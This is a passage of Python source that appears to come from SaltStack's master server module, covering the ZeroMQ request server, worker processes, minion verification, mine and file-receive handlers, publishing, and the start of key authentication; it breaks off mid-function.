''' def __init__(self, opts, crypticle, key, mkey): self.opts = opts self.master_key = mkey self.context = zmq.Context(self.opts['worker_threads']) # Prepare the zeromq sockets self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts) self.clients = self.context.socket(zmq.ROUTER) if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses self.clients.setsockopt(zmq.IPV4ONLY, 0) self.workers = self.context.socket(zmq.DEALER) self.w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) # Prepare the AES key self.key = key self.crypticle = crypticle def __bind(self): ''' Binds the reply server ''' dfn = os.path.join(self.opts['cachedir'], '.dfn') if os.path.isfile(dfn): try: os.remove(dfn) except os.error: pass log.info('Setting up the master communication server') self.clients.bind(self.uri) self.work_procs = [] for ind in range(int(self.opts['worker_threads'])): self.work_procs.append(MWorker(self.opts, self.master_key, self.key, self.crypticle)) for ind, proc in enumerate(self.work_procs): log.info('Starting Salt worker process {0}'.format(ind)) proc.start() self.workers.bind(self.w_uri) try: if HAS_PYTHON_SYSTEMD and systemd.daemon.booted(): systemd.daemon.notify('READY=1') except SystemError: # Daemon wasn't started by systemd pass while True: try: zmq.device(zmq.QUEUE, self.clients, self.workers) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc def start_publisher(self): ''' Start the salt publisher interface ''' # Start the publisher self.publisher = Publisher(self.opts) self.publisher.start() def start_event_publisher(self): ''' Start the salt publisher interface ''' # Start the publisher self.eventpublisher = salt.utils.event.EventPublisher(self.opts) self.eventpublisher.start() def start_reactor(self): ''' Start the reactor, but only if the reactor interface is configured ''' if self.opts.get('reactor'): self.reactor = salt.utils.event.Reactor(self.opts) self.reactor.start() def start_halite(self): ''' If halite is configured and installed, fire it up! ''' if HAS_HALITE and 'halite' in self.opts: log.info('Halite: Starting up ...') self.halite = Halite(self.opts['halite']) self.halite.start() elif 'halite' in self.opts: log.info('Halite: Not configured, skipping.') else: log.debug('Halite: Unavailable.') def run(self): ''' Start up the ReqServer ''' self.__bind() def destroy(self): if self.clients.closed is False: self.clients.setsockopt(zmq.LINGER, 1) self.clients.close() if self.workers.closed is False: self.workers.setsockopt(zmq.LINGER, 1) self.workers.close() if self.context.closed is False: self.context.term() # Also stop the workers for worker in self.work_procs: if worker.is_alive() is True: worker.terminate() def __del__(self): self.destroy() class MWorker(multiprocessing.Process): ''' The worker multiprocess instance to manage the backend operations for the salt master. 
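
    Each worker connects a REP socket to the workers.ipc file, refreshes the
    AES session key when the master has rotated it, deserializes each request
    and dispatches on the payload 'enc' field ('clear', 'pub' or 'aes') to
    the matching handler, sending back the serialized result.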
''' def __init__(self, opts, mkey, key, crypticle): multiprocessing.Process.__init__(self) self.opts = opts self.serial = salt.payload.Serial(opts) self.crypticle = crypticle self.mkey = mkey self.key = key self.k_mtime = 0 def __bind(self): ''' Bind to the local port ''' context = zmq.Context(1) socket = context.socket(zmq.REP) w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) log.info('Worker binding to socket {0}'.format(w_uri)) try: socket.connect(w_uri) while True: try: package = socket.recv() self._update_aes() payload = self.serial.loads(package) ret = self.serial.dumps(self._handle_payload(payload)) socket.send(ret) # Properly handle EINTR from SIGUSR1 except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc # Changes here create a zeromq condition, check with thatch45 before # making any zeromq changes except KeyboardInterrupt: socket.close() def _handle_payload(self, payload): ''' The _handle_payload method is the key method used to figure out what needs to be done with communication to the server ''' try: key = payload['enc'] load = payload['load'] except KeyError: return '' return {'aes': self._handle_aes, 'pub': self._handle_pub, 'clear': self._handle_clear}[key](load) def _handle_clear(self, load): ''' Take care of a cleartext command ''' log.info('Clear payload received with command {cmd}'.format(**load)) if load['cmd'].startswith('__'): return False return getattr(self.clear_funcs, load['cmd'])(load) def _handle_pub(self, load): ''' Handle a command sent via a public key pair ''' if load['cmd'].startswith('__'): return False log.info('Pubkey payload received with command {cmd}'.format(**load)) def _handle_aes(self, load): ''' Handle a command sent via an AES key ''' try: data = self.crypticle.loads(load) except Exception: return '' if 'cmd' not in data: log.error('Received malformed command {0}'.format(data)) return {} log.info('AES payload received with command {0}'.format(data['cmd'])) if data['cmd'].startswith('__'): return False return self.aes_funcs.run_func(data['cmd'], data) def _update_aes(self): ''' Check to see if a fresh AES key is available and update the components of the worker ''' dfn = os.path.join(self.opts['cachedir'], '.dfn') try: stats = os.stat(dfn) except os.error: return if stats.st_mode != 0100400: # Invalid dfn, return return if stats.st_mtime > self.k_mtime: # new key, refresh crypticle with salt.utils.fopen(dfn) as fp_: aes = fp_.read() if len(aes) != 76: return self.crypticle = salt.crypt.Crypticle(self.opts, aes) self.clear_funcs.crypticle = self.crypticle self.clear_funcs.opts['aes'] = aes self.aes_funcs.crypticle = self.crypticle self.aes_funcs.opts['aes'] = aes self.k_mtime = stats.st_mtime def run(self): ''' Start a Master Worker ''' self.clear_funcs = ClearFuncs( self.opts, self.key, self.mkey, self.crypticle) self.aes_funcs = AESFuncs(self.opts, self.crypticle) self.__bind() class AESFuncs(object): ''' Set up functions that are available when the load is encrypted with AES ''' # The AES Functions: # def __init__(self, opts, crypticle): self.opts = opts self.event = salt.utils.event.MasterEvent(self.opts['sock_dir']) self.serial = salt.payload.Serial(opts) self.crypticle = crypticle self.ckminions = salt.utils.minions.CkMinions(opts) # Create the tops dict for loading external top data self.tops = salt.loader.tops(self.opts) # Make a client self.local = salt.client.get_local_client(self.opts['conf_file']) # Create the master minion to access the external job cache self.mminion = 
salt.minion.MasterMinion( self.opts, states=False, rend=False) self.__setup_fileserver() def __setup_fileserver(self): ''' Set the local file objects from the file server interface ''' fs_ = salt.fileserver.Fileserver(self.opts) self._serve_file = fs_.serve_file self._file_hash = fs_.file_hash self._file_list = fs_.file_list self._file_list_emptydirs = fs_.file_list_emptydirs self._dir_list = fs_.dir_list self._symlink_list = fs_.symlink_list self._file_envs = fs_.envs def __verify_minion(self, id_, token): ''' Take a minion id and a string signed with the minion private key The string needs to verify as 'salt' with the minion public key ''' if not salt.utils.verify.valid_id(self.opts, id_): return False pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_) with salt.utils.fopen(pub_path, 'r') as fp_: minion_pub = fp_.read() tmp_pub = salt.utils.mkstemp() with salt.utils.fopen(tmp_pub, 'w+') as fp_: fp_.write(minion_pub) pub = None try: pub = RSA.load_pub_key(tmp_pub) except RSA.RSAError as err: log.error('Unable to load temporary public key "{0}": {1}' .format(tmp_pub, err)) try: os.remove(tmp_pub) if pub.public_decrypt(token, 5) == 'salt': return True except RSA.RSAError as err: log.error('Unable to decrypt token: {0}'.format(err)) log.error('Salt minion claiming to be {0} has attempted to' 'communicate with the master and could not be verified' .format(id_)) return False def __verify_minion_publish(self, clear_load): ''' Verify that the passed information authorized a minion to execute ''' # Verify that the load is valid if 'peer' not in self.opts: return False if not isinstance(self.opts['peer'], dict): return False if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')): return False # If the command will make a recursive publish don't run if clear_load['fun'].startswith('publish.'): return False # Check the permissions for this minion if not self.__verify_minion(clear_load['id'], clear_load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( ( 'Minion id {0} is not who it says it is and is attempting ' 'to issue a peer command' ).format(clear_load['id']) ) return False clear_load.pop('tok') perms = [] for match in self.opts['peer']: if re.match(match, clear_load['id']): # This is the list of funcs/modules! if isinstance(self.opts['peer'][match], list): perms.extend(self.opts['peer'][match]) if ',' in clear_load['fun']: # 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']] clear_load['fun'] = clear_load['fun'].split(',') arg_ = [] for arg in clear_load['arg']: arg_.append(arg.split()) clear_load['arg'] = arg_ # finally, check the auth of the load return self.ckminions.auth_check( perms, clear_load['fun'], clear_load['tgt'], clear_load.get('tgt_type', 'glob')) def _ext_nodes(self, load): ''' Return the results from an external node classifier if one is specified ''' if 'id' not in load: log.error('Received call for external nodes without an id') return {} if not salt.utils.verify.valid_id(self.opts, load['id']): return {} if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! 
log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') ret = {} # The old ext_nodes method is set to be deprecated in 0.10.4 # and should be removed within 3-5 releases in favor of the # "master_tops" system if self.opts['external_nodes']: if not salt.utils.which(self.opts['external_nodes']): log.error(('Specified external nodes controller {0} is not' ' available, please verify that it is installed' '').format(self.opts['external_nodes'])) return {} cmd = '{0} {1}'.format(self.opts['external_nodes'], load['id']) ndata = yaml.safe_load( subprocess.Popen( cmd, shell=True, stdout=subprocess.PIPE ).communicate()[0]) if 'environment' in ndata: saltenv = ndata['environment'] else: saltenv = 'base' if 'classes' in ndata: if isinstance(ndata['classes'], dict): ret[saltenv] = list(ndata['classes']) elif isinstance(ndata['classes'], list): ret[saltenv] = ndata['classes'] else: return ret # Evaluate all configured master_tops interfaces opts = {} grains = {} if 'opts' in load: opts = load['opts'] if 'grains' in load['opts']: grains = load['opts']['grains'] for fun in self.tops: if fun not in self.opts.get('master_tops', {}): continue try: ret.update(self.tops[fun](opts=opts, grains=grains)) except Exception as exc: # If anything happens in the top generation, log it and move on log.error( 'Top function {0} failed with error {1} for minion ' '{2}'.format( fun, exc, load['id'] ) ) return ret def _master_opts(self, load): ''' Return the master options to the minion ''' mopts = {} file_roots = {} envs = self._file_envs() for saltenv in envs: if saltenv not in file_roots: file_roots[saltenv] = [] mopts['file_roots'] = file_roots if load.get('env_only'): return mopts mopts['renderer'] = self.opts['renderer'] mopts['failhard'] = self.opts['failhard'] mopts['state_top'] = self.opts['state_top'] mopts['nodegroups'] = self.opts['nodegroups'] mopts['state_auto_order'] = self.opts['state_auto_order'] mopts['state_events'] = self.opts['state_events'] mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks'] mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks'] return mopts def _mine_get(self, load): ''' Gathers the data from the specified minions' mine ''' if any(key not in load for key in ('id', 'tgt', 'fun')): return {} if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') if 'mine_get' in self.opts: # If master side acl defined. 
if not isinstance(self.opts['mine_get'], dict): return {} perms = set() for match in self.opts['mine_get']: if re.match(match, load['id']): if isinstance(self.opts['mine_get'][match], list): perms.update(self.opts['mine_get'][match]) if not any(re.match(perm, load['fun']) for perm in perms): return {} ret = {} if not salt.utils.verify.valid_id(self.opts, load['id']): return ret checker = salt.utils.minions.CkMinions(self.opts) minions = checker.check_minions( load['tgt'], load.get('expr_form', 'glob') ) for minion in minions: mine = os.path.join( self.opts['cachedir'], 'minions', minion, 'mine.p') try: with salt.utils.fopen(mine, 'rb') as fp_: fdata = self.serial.load(fp_).get(load['fun']) if fdata: ret[minion] = fdata except Exception: continue return ret def _mine(self, load): ''' Return the mine data ''' if 'id' not in load or 'data' not in load: return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') if self.opts.get('minion_data_cache', False) or self.opts.get('enforce_mine_cache', False): cdir = os.path.join(self.opts['cachedir'], 'minions', load['id']) if not os.path.isdir(cdir): os.makedirs(cdir) datap = os.path.join(cdir, 'mine.p') if not load.get('clear', False): if os.path.isfile(datap): with salt.utils.fopen(datap, 'rb') as fp_: new = self.serial.load(fp_) if isinstance(new, dict): new.update(load['data']) load['data'] = new with salt.utils.fopen(datap, 'w+b') as fp_: fp_.write(self.serial.dumps(load['data'])) return True def _mine_delete(self, load): ''' Allow the minion to delete a specific function from its own mine ''' if 'id' not in load or 'fun' not in load: return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') if self.opts.get('minion_data_cache', False) or self.opts.get('enforce_mine_cache', False): cdir = os.path.join(self.opts['cachedir'], 'minions', load['id']) if not os.path.isdir(cdir): return True datap = os.path.join(cdir, 'mine.p') if os.path.isfile(datap): try: with salt.utils.fopen(datap, 'rb') as fp_: mine_data = self.serial.load(fp_) if isinstance(mine_data, dict): if mine_data.pop(load['fun'], False): with salt.utils.fopen(datap, 'w+b') as fp_: fp_.write(self.serial.dumps(mine_data)) except OSError: return False return True def _mine_flush(self, load): ''' Allow the minion to delete all of its own mine contents ''' if 'id' not in load: return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! 
log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') if self.opts.get('minion_data_cache', False) or self.opts.get('enforce_mine_cache', False): cdir = os.path.join(self.opts['cachedir'], 'minions', load['id']) if not os.path.isdir(cdir): return True datap = os.path.join(cdir, 'mine.p') if os.path.isfile(datap): try: os.remove(datap) except OSError: return False return True def _file_recv(self, load): ''' Allows minions to send files to the master, files are sent to the master file cache ''' if any(key not in load for key in ('id', 'path', 'loc')): return False if not self.opts['file_recv'] or os.path.isabs(load['path']): return False if os.path.isabs(load['path']) or '../' in load['path']: # Can overwrite master files!! return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False file_recv_max_size = 1024*1024 * self.opts.get('file_recv_max_size', 100) if len(load['data']) + load.get('loc', 0) > file_recv_max_size: log.error( 'Exceeding file_recv_max_size limit: {0}'.format( file_recv_max_size ) ) return False if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') cpath = os.path.join( self.opts['cachedir'], 'minions', load['id'], 'files', load['path']) cdir = os.path.dirname(cpath) if not os.path.isdir(cdir): try: os.makedirs(cdir) except os.error: pass if os.path.isfile(cpath) and load['loc'] != 0: mode = 'ab' else: mode = 'wb' with salt.utils.fopen(cpath, mode) as fp_: if load['loc']: fp_.seek(load['loc']) fp_.write(load['data']) return True def _pillar(self, load): ''' Return the pillar data for the minion ''' if any(key not in load for key in ('id', 'grains')): return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False load['grains']['id'] = load['id'] mods = set() for func in self.mminion.functions.values(): mods.add(func.__module__) for mod in mods: sys.modules[mod].__grains__ = load['grains'] pillar = salt.pillar.Pillar( self.opts, load['grains'], load['id'], load.get('saltenv', load.get('env')), load.get('ext'), self.mminion.functions) data = pillar.compile_pillar() if self.opts.get('minion_data_cache', False): cdir = os.path.join(self.opts['cachedir'], 'minions', load['id']) if not os.path.isdir(cdir): os.makedirs(cdir) datap = os.path.join(cdir, 'data.p') with salt.utils.fopen(datap, 'w+b') as fp_: fp_.write( self.serial.dumps( {'grains': load['grains'], 'pillar': data}) ) for mod in mods: sys.modules[mod].__grains__ = self.opts['grains'] return data def _minion_event(self, load): ''' Receive an event from the minion and fire it on the master event interface ''' if 'id' not in load: return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! 
log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') if 'events' not in load and ('tag' not in load or 'data' not in load): return False if 'events' in load: for event in load['events']: self.event.fire_event(event, event['tag']) # old dup event if load.get('pretag') is not None: self.event.fire_event(event, tagify(event['tag'], base=load['pretag'])) else: tag = load['tag'] self.event.fire_event(load, tag) return True def _return(self, load): ''' Handle the return data sent from the minions ''' # If the return data is invalid, just ignore it if any(key not in load for key in ('return', 'jid', 'id')): return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False if load['jid'] == 'req': # The minion is returning a standalone job, request a jobid load['arg'] = load.get('arg', load.get('fun_args', [])) load['tgt_type'] = 'glob' load['tgt'] = load['id'] prep_fstr = '{0}.prep_jid'.format(self.opts['master_job_cache']) load['jid'] = self.mminion.returners[prep_fstr](nocache=load.get('nocache', False)) # save the load, since we don't have it saveload_fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[saveload_fstr](load['jid'], load) log.info('Got return from {id} for job {jid}'.format(**load)) self.event.fire_event(load, load['jid']) # old dup event self.event.fire_event( load, tagify([load['jid'], 'ret', load['id']], 'job')) self.event.fire_ret_load(load) # if you have a job_cache, or an ext_job_cache, don't write to the regular master cache if not self.opts['job_cache'] or self.opts.get('ext_job_cache'): return # otherwise, write to the master cache fstr = '{0}.returner'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](load) def _syndic_return(self, load): ''' Receive a syndic minion return and format it to look like returns from individual minions. ''' # Verify the load if any(key not in load for key in ('return', 'jid', 'id')): return None # if we have a load, save it if 'load' in load: fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](load['jid'], load) # Format individual return loads for key, item in load['return'].items(): ret = {'jid': load['jid'], 'id': key, 'return': item} if 'out' in load: ret['out'] = load['out'] self._return(ret) def minion_runner(self, clear_load): ''' Execute a runner from a minion, return the runner's function data ''' if 'peer_run' not in self.opts: return {} if not isinstance(self.opts['peer_run'], dict): return {} if any(key not in clear_load for key in ('fun', 'arg', 'id', 'tok')): return {} if not self.__verify_minion(clear_load['id'], clear_load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( clear_load['id'] ) ) return {} clear_load.pop('tok') perms = set() for match in self.opts['peer_run']: if re.match(match, clear_load['id']): # This is the list of funcs/modules! 
if isinstance(self.opts['peer_run'][match], list): perms.update(self.opts['peer_run'][match]) good = False for perm in perms: if re.match(perm, clear_load['fun']): good = True if not good: return {} # Prepare the runner object opts = {'fun': clear_load['fun'], 'arg': clear_load['arg'], 'id': clear_load['id'], 'doc': False, 'conf_file': self.opts['conf_file']} opts.update(self.opts) runner = salt.runner.Runner(opts) return runner.run() def pub_ret(self, load): ''' Request the return data from a specific jid, only allowed if the requesting minion also initialted the execution. ''' if any(key not in load for key in ('jid', 'id', 'tok')): return {} if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') # Check that this minion can access this data auth_cache = os.path.join( self.opts['cachedir'], 'publish_auth') if not os.path.isdir(auth_cache): os.makedirs(auth_cache) jid_fn = os.path.join(auth_cache, load['jid']) with salt.utils.fopen(jid_fn, 'r') as fp_: if not load['id'] == fp_.read(): return {} # Grab the latest and return return self.local.get_cache_returns(load['jid']) def minion_pub(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: peer: .*: - .* This configuration will enable all minions to execute all commands. peer: foo.example.com: - test.* This configuration will only allow the minion foo.example.com to execute commands from the test module ''' if not self.__verify_minion_publish(clear_load): return {} # Set up the publication payload load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'expr_form': clear_load.get('tgt_type', 'glob'), 'tgt': clear_load['tgt'], 'ret': clear_load['ret'], 'id': clear_load['id'], } if 'tgt_type' in clear_load: if clear_load['tgt_type'].startswith('node'): if clear_load['tgt'] in self.opts['nodegroups']: load['tgt'] = self.opts['nodegroups'][clear_load['tgt']] load['expr_form_type'] = 'compound' load['expr_form'] = clear_load['tgt_type'] else: return {} else: load['expr_form'] = clear_load['tgt_type'] ret = {} ret['jid'] = self.local.cmd_async(**load) ret['minions'] = self.ckminions.check_minions( clear_load['tgt'], load['expr_form']) auth_cache = os.path.join( self.opts['cachedir'], 'publish_auth') if not os.path.isdir(auth_cache): os.makedirs(auth_cache) jid_fn = os.path.join(auth_cache, ret['jid']) with salt.utils.fopen(jid_fn, 'w+') as fp_: fp_.write(clear_load['id']) return ret def minion_publish(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: peer: .*: - .* This configuration will enable all minions to execute all commands. 
peer: foo.example.com: - test.* This configuration will only allow the minion foo.example.com to execute commands from the test module ''' if not self.__verify_minion_publish(clear_load): return {} # Set up the publication payload load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'expr_form': clear_load.get('tgt_type', 'glob'), 'tgt': clear_load['tgt'], 'ret': clear_load['ret'], 'id': clear_load['id'], } if 'tmo' in clear_load: try: load['timeout'] = int(clear_load['tmo']) except ValueError: msg = 'Failed to parse timeout value: {0}'.format( clear_load['tmo']) log.warn(msg) return {} if 'timeout' in clear_load: try: load['timeout'] = int(clear_load['timeout']) except ValueError: msg = 'Failed to parse timeout value: {0}'.format( clear_load['tmo']) log.warn(msg) return {} if 'tgt_type' in clear_load: if clear_load['tgt_type'].startswith('node'): if clear_load['tgt'] in self.opts['nodegroups']: load['tgt'] = self.opts['nodegroups'][clear_load['tgt']] load['expr_form_type'] = 'compound' else: return {} else: load['expr_form'] = clear_load['tgt_type'] load['raw'] = True ret = {} for minion in self.local.cmd_iter(**load): if clear_load.get('form', '') == 'full': data = minion if 'jid' in minion: ret['__jid__'] = minion['jid'] data['ret'] = data.pop('return') ret[minion['id']] = data else: ret[minion['id']] = minion['return'] if 'jid' in minion: ret['__jid__'] = minion['jid'] for key, val in self.local.get_cache_returns(ret['__jid__']).items(): if not key in ret: ret[key] = val if clear_load.get('form', '') != 'full': ret.pop('__jid__') return ret def revoke_auth(self, load): ''' Allow a minion to request revocation of its own key ''' if 'id' not in load or 'tok' not in load: return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( ( 'Minion id {0} is not who it says it is and is attempting ' 'to revoke the key for {0}' ).format(load['id']) ) return False keyapi = salt.key.Key(self.opts) keyapi.delete_key(load['id']) return True def run_func(self, func, load): ''' Wrapper for running functions executed with AES encryption ''' # Don't honor private functions if func.startswith('__'): return self.crypticle.dumps({}) # Run the func if hasattr(self, func): try: start = time.time() ret = getattr(self, func)(load) log.trace( 'Master function call {0} took {1} seconds'.format( func, time.time() - start ) ) except Exception: ret = '' log.error( 'Error in function {0}:\n'.format(func), exc_info=True ) else: log.error( 'Received function {0} which is unavailable on the master, ' 'returning False'.format( func ) ) return self.crypticle.dumps(False) # Don't encrypt the return value for the _return func # (we don't care about the return value, so why encrypt it?) 
if func == '_return': return ret if func == '_pillar' and 'id' in load: if load.get('ver') != '2' and self.opts['pillar_version'] == 1: # Authorized to return old pillar proto return self.crypticle.dumps(ret) # encrypt with a specific AES key pubfn = os.path.join(self.opts['pki_dir'], 'minions', load['id']) key = salt.crypt.Crypticle.generate_key_string() pcrypt = salt.crypt.Crypticle( self.opts, key) try: pub = RSA.load_pub_key(pubfn) except RSA.RSAError: return self.crypticle.dumps({}) pret = {} pret['key'] = pub.public_encrypt(key, 4) pret['pillar'] = pcrypt.dumps( ret if ret is not False else {} ) return pret # AES Encrypt the return return self.crypticle.dumps(ret) class ClearFuncs(object): ''' Set up functions that are safe to execute when commands sent to the master without encryption and authentication ''' # The ClearFuncs object encapsulates the functions that can be executed in # the clear: # publish (The publish from the LocalClient) # _auth def __init__(self, opts, key, master_key, crypticle): self.opts = opts self.serial = salt.payload.Serial(opts) self.key = key self.master_key = master_key self.crypticle = crypticle # Create the event manager self.event = salt.utils.event.MasterEvent(self.opts['sock_dir']) # Make a client self.local = salt.client.get_local_client(self.opts['conf_file']) # Make an minion checker object self.ckminions = salt.utils.minions.CkMinions(opts) # Make an Auth object self.loadauth = salt.auth.LoadAuth(opts) # Stand up the master Minion to access returner data self.mminion = salt.minion.MasterMinion( self.opts, states=False, rend=False) # Make a wheel object self.wheel_ = salt.wheel.Wheel(opts) def __check_permissions(self, filename): ''' Check if the specified filename has correct permissions ''' if salt.utils.is_windows(): return True # After we've ascertained we're not on windows try: user = self.opts['user'] pwnam = pwd.getpwnam(user) uid = pwnam[2] gid = pwnam[3] groups = salt.utils.get_gid_list(user, include_default=False) except KeyError: log.error( 'Failed to determine groups for user {0}. The user is not ' 'available.\n'.format( user ) ) return False fmode = os.stat(filename) if os.getuid() == 0: if fmode.st_uid == uid or fmode.st_gid != gid: return True elif self.opts.get('permissive_pki_access', False) \ and fmode.st_gid in groups: return True else: if stat.S_IWOTH & fmode.st_mode: # don't allow others to write to the file return False # check group flags if self.opts.get('permissive_pki_access', False) \ and stat.S_IWGRP & fmode.st_mode: return True elif stat.S_IWGRP & fmode.st_mode: return False # check if writable by group or other if not (stat.S_IWGRP & fmode.st_mode or stat.S_IWOTH & fmode.st_mode): return True return False def __check_signing_file(self, keyid, signing_file): ''' Check a keyid for membership in a signing file ''' if not signing_file or not os.path.exists(signing_file): return False if not self.__check_permissions(signing_file): message = 'Wrong permissions for {0}, ignoring content' log.warn(message.format(signing_file)) return False with salt.utils.fopen(signing_file, 'r') as fp_: for line in fp_: line = line.strip() if line.startswith('#'): continue else: if salt.utils.expr_match(keyid, line): return True return False def __check_autoreject(self, keyid): ''' Checks if the specified keyid should automatically be rejected. ''' return self.__check_signing_file( keyid, self.opts.get('autoreject_file', None) ) def __check_autosign(self, keyid): ''' Checks if the specified keyid should automatically be signed. 
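
        If auto_accept is enabled in the master config every key is
        automatically signed; otherwise the keyid is matched against the
        patterns listed in the configured autosign_file.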
''' if self.opts['auto_accept']: return True return self.__check_signing_file( keyid, self.opts.get('autosign_file', None) ) def _auth(self, load): ''' Authenticate the client, use the sent public key to encrypt the AES key which was generated at start up. This method fires an event over the master event manager. The event is tagged "auth" and returns a dict with information about the auth event # Verify that the key we are receiving matches the stored key # Store the key if it is not there # Make an RSA key with the pub key # Encrypt the AES key as an encrypted salt.payload # Package the return and return it ''' if not salt.utils.verify.valid_id(self.opts, load['id']): log.info( 'Authentication request from invalid id {id}'.format(**load) ) return {'enc': 'clear', 'load': {'ret': False}} log.info('Authentication request from {id}'.format(**load)) # Check if key is configured to be auto-rejected/signed auto_reject = self.__check_autoreject(load['id']) auto_sign = self.__check_autosign(load['id']) pubfn = os.path.join(self.opts['pki_dir'], 'minions', load['id']) pubfn_pend = os.path.join(self.opts['pki_dir'], 'minions_pre', load['id']) pubfn_rejected = os.path.join(self.opts['pki_dir'], 'minions_rejected', load['id']) pubfn_denied = os.path.join(self.opts['pki_dir'], 'minions_denied', load['id']) if self.opts['open_mode']: # open mode is turned on, nuts to checks and overwrite whatever # is there pass elif os.path.isfile(pubfn_rejected): # The key has been rejected, don't place it in pending log.info('Public key rejected for {id}'.format(**load)) eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': False}} elif os.path.isfile(pubfn): # The key has been accepted, check it if salt.utils.fopen(pubfn, 'r').read() != load['pub']: log.error( 'Authentication attempt from {id} failed, the public ' 'keys did not match. This may be an attempt to compromise ' 'the Salt cluster.'.format(**load) ) # put denied minion key into minions_denied with salt.utils.fopen(pubfn_denied, 'w+') as fp_: fp_.write(load['pub']) eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': False}} elif not os.path.isfile(pubfn_pend): # The key has not been accepted, this is a new minion if os.path.isdir(pubfn_pend): # The key path is a directory, error out log.info( 'New public key {id} is a directory'.format(**load) ) eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': False}} if auto_reject: key_path = pubfn_rejected log.info('New public key for {id} rejected via autoreject_file' .format(**load)) key_act = 'reject' key_result = False elif not auto_sign: key_path = pubfn_pend log.info('New public key for {id} placed in pending' .format(**load)) key_act = 'pend' key_result = True else: # The key is being automatically accepted, don't do anything # here and let the auto accept logic below handle it. 
